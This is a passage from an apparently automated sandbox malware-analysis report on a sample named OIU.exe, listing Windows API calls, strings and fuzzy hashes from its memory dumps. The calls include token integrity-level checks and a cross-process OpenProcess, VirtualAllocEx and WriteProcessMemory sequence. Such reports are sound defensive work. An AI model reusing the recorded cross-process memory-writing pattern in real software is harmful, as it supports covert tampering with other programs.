                                                                      • Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 347f721c921abe24ec5d61d4173399e29454f26c62a1a93b8e60db7e03e04bf7
                                                                      • Instruction ID: 79d3bf0edfff08f95ec5d81f1c48db9c898ad40eaa4d71e67e1223a654f8ecfc
                                                                      • Opcode Fuzzy Hash: 347f721c921abe24ec5d61d4173399e29454f26c62a1a93b8e60db7e03e04bf7
                                                                      • Instruction Fuzzy Hash: 19011331C41639DBCF00ABE5D999BEEBB78BB09701F000956E912B2291CB309695DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 2aa60dfb7cd5619118decad54cf6b514dd4c29d1802a28982143cf1dacace830
                                                                      • Instruction ID: 4ab7c2d21e9c093c37e2c04b44c92b20f66d79885ad9f59bfa6486a756c775a6
                                                                      • Opcode Fuzzy Hash: 2aa60dfb7cd5619118decad54cf6b514dd4c29d1802a28982143cf1dacace830
                                                                      • Instruction Fuzzy Hash: 7D016975200205BFDB154FA4DC89BAE3B6EEF8A3A0B240418FE41E33A0DA31DD00DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 6ef08b5b95c7e850cbbb85c9548eae0e2745691d55a6557d7cca472914b91c1d
                                                                      • Instruction ID: 6fc16de846e03cde805c7c5a4a20f5683438ed6d7b7a1aa3142b41a0722f0488
                                                                      • Opcode Fuzzy Hash: 6ef08b5b95c7e850cbbb85c9548eae0e2745691d55a6557d7cca472914b91c1d
                                                                      • Instruction Fuzzy Hash: BFF04935210301AFDB224FA49C89F5E3BADEF89762F144414FA85E7291CA70DC50CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                                      • Instruction ID: 9bb10c7243aa512d7de0f6b5393400eb2cb7044eabc53ec91412224ff92d7d7b
                                                                      • Opcode Fuzzy Hash: d07dc6278361b13e665314ef1817262e7b538f70ce346c9f1d551fb750f0cf67
                                                                      • Instruction Fuzzy Hash: 3AF06D35210301EBDB215FA4EC89F5E3BADEF89761F140414FE85E7290CA70D950CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                                      • Instruction ID: f2a79699114a262bed80875c0be496ad8c38537cbfa9bedad09905795aea1d84
                                                                      • Opcode Fuzzy Hash: 3be5036fe0d27ba08e8212c364921c635c5f146978900d62afb8883224e62c5c
                                                                      • Instruction Fuzzy Hash: 5501A272800B15DFC730AF66D880456F7F5BF513153658A3FD1A652931C3B1AA95EF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BDD752
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDD764
                                                                      • _free.LIBCMT ref: 00BDD776
                                                                      • _free.LIBCMT ref: 00BDD788
                                                                      • _free.LIBCMT ref: 00BDD79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 7640e5ac60de64e8c1a254cb9a882e6ea12612b4513675199d9a27bd2f643491
                                                                      • Instruction ID: dd583b9f85c91b76bf32cb8d2907a0944346ba99ca78630409c3dca1873b800e
                                                                      • Opcode Fuzzy Hash: 7640e5ac60de64e8c1a254cb9a882e6ea12612b4513675199d9a27bd2f643491
                                                                      • Instruction Fuzzy Hash: 77F04F32544244ABC635EB65F9C1E2ABBDDFB44310B940897F098D7741EB24FC808A64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BD22BE
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BD22D0
                                                                      • _free.LIBCMT ref: 00BD22E3
                                                                      • _free.LIBCMT ref: 00BD22F4
                                                                      • _free.LIBCMT ref: 00BD2305
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: ea4cac18b4af99d88ecabb49f0680448b30573b4955ba56358e9274bca22eb06
                                                                      • Instruction ID: 0e4b081c8ef25af41eef942c1a70146cf6975911b0f2204ca6aa2e6cb58a3a3d
                                                                      • Opcode Fuzzy Hash: ea4cac18b4af99d88ecabb49f0680448b30573b4955ba56358e9274bca22eb06
                                                                      • Instruction Fuzzy Hash: 57F030784001908B8722AFA8BC51B1C7BA8F72C7507140597F418D73B2DB740491BBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                                      • Instruction ID: 89480a73a4c13bc06dd36ec5117fd12057a963acf62198fe68937e1a705efd8a
                                                                      • Opcode Fuzzy Hash: 44d26e9e9ba133ee68a08c3952953bffe18cd99207cb786331fc2a9fb53e8b28
                                                                      • Instruction Fuzzy Hash: E8F0EC31015744EBDB265F69ED5C7BC3FA5EB11322F088254FA6A650F0C7748996DF20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$_free
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3432400110-3206640213
                                                                      • Opcode ID: 65cec1ac7b2ccc76cf53d8982f6f3580768245f2e74c8d85e28144f738648a86
                                                                      • Instruction ID: 8063c240f2e7b9307d505d88005285abffa36cd08963edfe08d026a61576d4e0
                                                                      • Opcode Fuzzy Hash: 65cec1ac7b2ccc76cf53d8982f6f3580768245f2e74c8d85e28144f738648a86
                                                                      • Instruction Fuzzy Hash: 23D1E131900206BADB289F6CC895BBAF7F1EF05710F24499BE505AB751F3359D80CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BC0242: EnterCriticalSection.KERNEL32( =,00C71884,?,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC024D
                                                                        • Part of subcall function 00BC0242: LeaveCriticalSection.KERNEL32( =,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC028A
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                                      • __Init_thread_footer.LIBCMT ref: 00C27BFB
                                                                        • Part of subcall function 00BC01F8: EnterCriticalSection.KERNEL32( =,?,?,00BB8747,00C72514), ref: 00BC0202
                                                                        • Part of subcall function 00BC01F8: LeaveCriticalSection.KERNEL32( =,?,00BB8747,00C72514), ref: 00BC0235
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                      • API String ID: 535116098-3733170431
                                                                      • Opcode ID: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                                      • Instruction ID: 6eaae023dc6b296db55037e3ea1a54a0f9e60bc263cd9c478618dd433ee2d552
                                                                      • Opcode Fuzzy Hash: d58f60b487baf2019f63a4d6fc6583a620e5d6bd6b9ed954c22594186c14d39e
                                                                      • Instruction Fuzzy Hash: CB918A70A04219EFCB14EF94E8D19BDB7B1FF49300F108199F816AB6A2DB71AE41DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021D0,?,?,00000034,00000800,?,00000034), ref: 00C0B42D
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C02760
                                                                        • Part of subcall function 00C0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C0B3F8
                                                                        • Part of subcall function 00C0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C0B355
                                                                        • Part of subcall function 00C0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B365
                                                                        • Part of subcall function 00C0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C02194,00000034,?,?,00001004,00000000,00000000), ref: 00C0B37B
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C027CD
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C0281A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                                      • Instruction ID: e2a8df74d1264c4c9f20b45999cbe21c5d23a7c7b93a581ef63facd8a462fb00
                                                                      • Opcode Fuzzy Hash: 05149301e5923c0218c3e1a930707fc610bfbcedfab1b74582822b790317ced0
                                                                      • Instruction Fuzzy Hash: 34411B76900218AFDB10DFA4CD86BEEBBB8AF09700F108095FA55B7191DB706F45DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\OIU.exe,00000104), ref: 00BD1769
                                                                      • _free.LIBCMT ref: 00BD1834
                                                                      • _free.LIBCMT ref: 00BD183E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\AppData\Roaming\OIU.exe
                                                                      • API String ID: 2506810119-1393054790
                                                                      • Opcode ID: 6cba27b6e1d8816f2ca005c59ae4356f0de8f0a8233444185749030fcbd6e5be
                                                                      • Instruction ID: 00b63d2289d0ec3b913b9b03172150365ea773c9383adc7f4e35c402db33addb
                                                                      • Opcode Fuzzy Hash: 6cba27b6e1d8816f2ca005c59ae4356f0de8f0a8233444185749030fcbd6e5be
                                                                      • Instruction Fuzzy Hash: A1319CB5A00248BBDB21DB9D9885E9EFBFCEB85310B1445E7F80497321E6708E80DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                                      • Instruction ID: fdfa5f3334d085cd5b069189f1f650456f77e8ad39ca2ae8047e27b74cfaa86b
                                                                      • Opcode Fuzzy Hash: d04f42c04cd5929287a23ee1f4115a2de681169ce16dfe64838f2ae557229ce5
                                                                      • Instruction Fuzzy Hash: F1417C312143019FDB20DF25D8C4B9EBBE4AB85320F148B5EF9A5972E1D730EA04DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C344AA
                                                                      • GetWindowLongW.USER32 ref: 00C344C7
                                                                      • SetWindowLongW.USER32 ref: 00C344D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: dbe4d67f5998f918d1105d9fb7bd04e6d471441017d679d358c383a2a8e963fc
                                                                      • Instruction ID: 6a5b270b58ab4e2663549b3b1e6c47aa9ce1201763999c9517ab0dc35f90e8b7
                                                                      • Opcode Fuzzy Hash: dbe4d67f5998f918d1105d9fb7bd04e6d471441017d679d358c383a2a8e963fc
                                                                      • Instruction Fuzzy Hash: BA318B32220205AFDB249E38DC85BEA7BA9EB09334F204725F979E21E0D770ED509B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C23077,?,?), ref: 00C23378
                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                                      • _wcslen.LIBCMT ref: 00C2309B
                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00C23106
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 946324512-2422070025
                                                                      • Opcode ID: 331a431b93b247596c551ddac7e9eed140ab169b56fc607aa9faf29cb7cb803d
                                                                      • Instruction ID: 4098ebcfba9ccdc37f1c3695bcc2bb377ec2a0ced45a6302347ca9f3c9c07069
